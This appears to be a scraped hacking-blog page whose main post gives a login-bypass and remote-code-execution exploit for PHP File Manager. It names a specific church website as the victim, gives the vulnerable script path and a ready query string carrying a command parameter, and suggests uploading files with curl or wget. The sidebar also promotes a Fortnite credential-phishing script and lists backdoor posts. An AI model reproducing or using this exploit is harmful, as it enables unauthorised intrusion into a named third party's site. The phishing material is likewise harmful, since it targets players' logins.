Labels

Powered by Blogger.

ur-solution

chase what you want

Featured Post

Script Phising Fortnite - Redeem Season 8

Script Phising Fortnite - Redeem Season 8 1. Event Display 2. Login Display 3. Display After Login Note : u can...

Search This Blog

Blog Archive

Categories

Backdoor (5) Script (1) Tutorials (12)

Blogger templates

Blogger news

ngewek

haha

Recent Posts

About

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel

PHP File Manager Remote Code Execution

PHP File Manager bypass login with Remote code execution





Poc URLs : 
victim : http://malayattoorchurch.com
bug : http://malayattoorchurch.com/gallery/phpfm.php
exploit : 
?blockKeys[0]=&fm_self=FOOO&loggedon=d41d8cd98f00b204e9800998ecf8427e&action=6&cmd=
example : 
http://malayattoorchurch.com/gallery/phpfm.php

You can upload your files with curl or wget

No comments:

Post a Comment